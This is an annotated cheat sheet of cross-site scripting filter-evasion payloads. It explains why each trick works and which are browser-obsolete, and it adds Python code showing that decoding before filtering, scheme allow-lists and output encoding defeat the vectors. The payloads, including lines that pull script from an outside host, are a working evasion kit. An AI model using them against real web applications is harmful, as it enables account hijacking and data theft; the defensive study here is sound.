1. Vary the case of the characters

<sCript>alert('d')</scRipT>

The tokenizer case-folds tag names, so this is an ordinary script element; only a filter that compares the name literally misses it.
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

A filter that takes the first ">" as the end of the tag reads only <SCRIPT a="> and never sees the SRC attribute; the browser's tokenizer honours the quotes and does. The extra "<" in the first line defeats filters that pair up "<" and ">" and then compare what is between them. The backtick form relies on IE accepting ` as an attribute-value delimiter.
3. Use an extension other than .js

<script src="bad.jpg"></script>

The file name is irrelevant to the browser: whatever the response body is gets executed as script, so a filter keyed on ".js" achieves nothing. What does matter is the Content-Type: current browsers refuse a script response served as an image, audio, video or CSV type, and with X-Content-Type-Options: nosniff any non-JavaScript type.
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

The tokenizer treats "/" as an attribute separator, so both are still <script src="t.js">; a filter that splits the tag on whitespace reads the tag name as SCRIPT/SRC or SCRIPT/anyword.
6. Use a tab or a newline to evade

<img src="jav&#x09;ascr&#x09;ipt:alert('XSS3')">   -> tab

<img src="jav&#x0A;ascr&#x0A;ipt:alert('XSS3')">   -> new line

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(The gaps in the original are literal tab and newline characters; &#x09; and &#x0A; are the same characters written as character references, which the HTML parser decodes.) The URL parser then removes every tab, LF and CR from the attribute value before it reads the scheme, so the browser still sees javascript: while a filter that matches the literal string "javascript:" sees nothing.
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

In CSS a backslash before a non-hex character is an escape for that character, and comments are dropped by the tokenizer, so expre\ssi\on and expr/*anyword*/ession are both the identifier expression. (expression() itself is an IE-only extension, dropped from IE8 standards mode onward; the escape and comment tricks apply to any CSS keyword a filter is looking for.)
8. Use hex encoding to evade (the ";" closing each character reference can also be left out)

<DIV STYLE="width: &#x65&#x78&#x70&#x72&#x65&#x5C&#x73&#x73&#x69&#x5C&#x6F&#x6E(alert('XSS31'));">

Decoded: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('abc');">

Decoded: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

The encoded lines above are the decoded ones rewritten with hex character references (e = &#x65, \ = &#x5C, j = &#x6A, : = &#x3A, and so on); the post's own encoded lines had already been decoded when the page was rendered. The HTML parser turns the references back into text before the attribute value is used, so only a filter that inspects the raw markup is fooled; one that decodes first, as the browser does, is not. Note that the ";" is still needed wherever the next character is itself a hex digit (&#x3A;alert), otherwise it would be swallowed into the reference.
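As an added example (not part of the original post), the following Python reproduces the browser's decoding steps for items 6, 7 and 8 and checks the page's own vectors against a literal-substring filter and against a check that normalizes first. The same url_scheme() check applies to the javascript: URLs listed later under item 14. The sample values are constructed from the post; the allow-list of schemes and the function names are assumptions for the example, and css_normalize() deliberately does not model CSS strings.

```python
import html
import re

# ---- URL side: items 6 and 8 (and the javascript: attributes of item 14) ----
_SCHEME = re.compile(r'^([a-zA-Z][a-zA-Z0-9+.\-]*):')
_C0_OR_SPACE_EDGES = re.compile(r'^[\x00-\x20]+|[\x00-\x20]+$')
_TAB_OR_NEWLINE = re.compile(r'[\t\n\r]')


def url_scheme(attribute_value: str):
    """Scheme the browser ends up with for a src/href value, or None if relative.

    The order mirrors the browser: the HTML tokenizer decodes character
    references in the attribute (html.unescape accepts the '&#x6A' form with no
    ';'), then the URL parser strips leading/trailing C0 controls and spaces and
    deletes every tab, LF and CR before reading the scheme.
    """
    value = html.unescape(attribute_value)
    value = _C0_OR_SPACE_EDGES.sub('', value)
    value = _TAB_OR_NEWLINE.sub('', value)
    m = _SCHEME.match(value)
    return m.group(1).lower() if m else None


ALLOWED_SCHEMES = {'http', 'https', 'mailto'}  # assumption: what this app links to


def url_is_allowed(attribute_value: str) -> bool:
    """Allow-list on the resolved scheme; relative URLs (no scheme) pass."""
    scheme = url_scheme(attribute_value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# ---- CSS side: item 7 ---------------------------------------------------------
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)', re.S)


def css_normalize(css: str) -> str:
    """Strip comments and decode backslash escapes the way the CSS tokenizer does.

    '\\s' before a non-hex character is just 's' and '\\0065' is 'e', so
    'expre\\ssi\\on' and 'expr/*x*/ession' both come back as 'expression'.
    Strings are not modelled: a '/*' inside a quoted string is treated as a
    comment here, which a full tokenizer would not do.
    """
    text = _CSS_COMMENT.sub('', css)
    return _CSS_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), text)


def style_attribute_is_dangerous(attribute_value: str) -> bool:
    """STYLE attribute check: HTML-decode first (it is an attribute), then normalize."""
    text = css_normalize(html.unescape(attribute_value)).lower()
    return 'expression(' in text or 'javascript:' in _TAB_OR_NEWLINE.sub('', text)


def naive_blocked(attribute_value: str) -> bool:
    """The literal-substring check that items 6, 7 and 8 are written to get past."""
    return 'javascript:' in attribute_value or 'expression(' in attribute_value


# Constructed samples: the post's vectors followed by two harmless values.
SAMPLES = [
    ("url", "jav\tascr\tipt:alert('XSS3')"),                      # item 6, tabs
    ("url", "jav\nascr\nipt:alert('XSS3')"),                      # item 6, newlines
    ("url", "jav&#x09;ascript:alert('XSS');"),                    # item 6, tab as reference
    ("url", "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('abc');"),  # item 8
    ("style", "xss:expre\\ssion(alert(\"XSS33\"))"),              # item 7, backslash
    ("style", "xss:expr/*anyword*/ession(alert('sss'))"),         # item 7, comment
    ("style", "width: expre\\ssi\\on(alert('XSS31'));"),          # item 7, two backslashes
    ("url", "https://example.com/page"),
    ("style", "width: 10px;"),
]


def check_samples():
    """(kind, value, naive_blocked, normalized_blocked) for each sample."""
    rows = []
    for kind, value in SAMPLES:
        if kind == "url":
            blocked = not url_is_allowed(value)
        else:
            blocked = style_attribute_is_dangerous(value)
        rows.append((kind, value, naive_blocked(value), blocked))
    return rows


if __name__ == "__main__":
    for kind, value, naive, normalized in check_samples():
        print(f"{kind:5} naive={naive!s:5} normalized={normalized!s:5} {value!r}")
```

The point of the ordering inside url_scheme() is that decoding and stripping happen in the browser before the scheme is compared; a filter that compares first and never decodes is checking a string the browser never uses.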
9. Script in HTML tag attributes (event handlers)

<body onload="alert('onload')">

Any of these attributes takes script:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
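As an added example (not part of the original post), the following Python shows why the tag-level tricks in items 1, 2, 5 and 9 work: it runs the post's own vectors through a text-level filter of the kind they target and through Python's html.parser, which tokenizes roughly the way a browser does, and then shows the fix that makes the whole question moot for a text context, output encoding. The vectors are copied from the post; the filter design, class and function names are assumptions for the example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed samples: the tag-level vectors from items 1, 2, 5 and 9 of the post.
VECTORS = [
    "<sCript>alert('d')</scRipT>",           # item 1: mixed case
    "<<script>alert('c')//<</script>",      # item 2: extra '<' in front of the tag
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',    # item 2: '>' hidden inside a quoted value
    '<SCRIPT/SRC="t.js"></SCRIPT>',          # item 5: '/' instead of whitespace
    '<SCRIPT/anyword SRC="t.js"></SCRIPT>',  # item 5: junk word after the '/'
    "<body onload=\"alert('onload')\">",     # item 9: event-handler attribute
]

_TAG = re.compile(r'<([^>]*)>')
_HANDLER = re.compile(r'\bon\w+\s*=', re.I)


def naive_blocked(markup: str) -> bool:
    """A text-level filter of the kind these vectors are built to slip past.

    It takes everything up to the first '>' as the tag, the first
    whitespace-delimited word as the tag name, compares that name literally
    (the assumption item 1 exploits) and looks for on*= inside the tag body.
    """
    for body in _TAG.findall(markup):
        words = body.split()
        name = words[0] if words else ''
        if name == 'script' or _HANDLER.search(body):
            return True
    return False


class BrowserView(HTMLParser):
    """Approximates the browser's tokenizer: tag and attribute names are
    case-folded, '/' separates attributes, and a '>' inside a quoted value
    does not end the tag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.findings.append(('script-tag', dict(attrs).get('src')))
        for name, _value in attrs:
            if name.startswith('on'):  # names arrive already lower-cased
                self.findings.append(('event-handler', name))


def scan(markup: str):
    """Script tags and event handlers as the tokenizer sees them."""
    parser = BrowserView()
    parser.feed(markup)
    parser.close()
    return parser.findings


def render_text(user_input: str) -> str:
    """The actual fix for a text context: encode on output instead of hunting
    for bad tags. None of the vectors survives this."""
    return html.escape(user_input, quote=True)


def scan_all():
    """What the text filter and the tokenizer make of each vector."""
    return {v: {'naive': naive_blocked(v), 'parser': scan(v)} for v in VECTORS}


if __name__ == '__main__':
    for vector, result in scan_all().items():
        print(f"{vector!r:44} naive_blocked={result['naive']!s:5} parser={result['parser']}")
    print(render_text(VECTORS[0]))
```

Every vector comes out of the tokenizer as a plain script element or an on* attribute; the text filter misses the first five because it never tokenizes. Where untrusted input must become HTML rather than text, the same lesson applies: parse with a real HTML parser and rebuild from an allow-list of elements and attributes, rather than pattern-match the raw string.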
10. XSS code inside an swf file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

AllowScriptAccess="always" lets the Flash movie call into the embedding page's DOM, so the script lives in the swf and the HTML carries no obvious payload. (This needs the Flash plug-in, which current browsers no longer ship.)
11. Use CDATA to split the XSS code and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Adjacent CDATA sections, or a comment in the middle of a value, disappear once the XML is parsed, so the bound field contains javascript: in one piece even though the markup never does. XML data islands with DATASRC/DATAFLD are an IE-only feature.
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

The payload sits in the "to" attribute as character references, so the HTML parser passes it through as text; HTML+TIME then assigns it to innerHTML, where DEFER makes the script run. IE-only behaviour.
13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

The script does not run here; it runs wherever the application later echoes the cookie value into a page unencoded. Current browsers ignore a Set-Cookie meta tag altogether.
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Of these, the javascript: URL in IFRAME and FRAME SRC (and in A HREF) still executes in current browsers; in image sources, table backgrounds, CSS url() and stylesheet hrefs it was only ever honoured by IE- and Netscape-era browsers. The fix is the same everywhere: resolve the scheme the way the browser does and allow only http(s) or relative URLs, rather than searching the raw value for "javascript:".